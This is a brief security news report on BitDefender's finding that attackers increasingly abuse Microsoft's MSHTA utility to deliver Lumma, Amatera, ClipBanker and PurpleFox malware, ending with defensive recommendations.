ATTACKERS are increasingly abusing Microsoft’s legacy MSHTA utility to silently deliver stealers, loaders and persistent malware through phishing, fake software downloads and LOLBIN-based attack chains, according to BitDefender. Since the start of this year there has been a dramatic rise in MSHTA-related activity, with BitDefender noting the uptick reflects increased threat actor use rather than renewed administrative adoption.
The report highlights campaigns delivering Lumma and Amatera stealers via HTA loaders, including one Lumma operation that phished victims through social posts and SEO-poisoned sites offering “free software”, where a Python interpreter is loaded through an MSHTA executable to contact a C2. Other MSHTA-driven campaigns have delivered ClipBanker and PurpleFox, with PurpleFox allegedly using msiexec from an MSHTA command line to fetch an MSI disguised as a PNG.
Experts emphasise that social engineering remains a central facet of these attacks, and recommend blocking legacy binaries and strengthening pre-execution and runtime protections. 19 May 2026.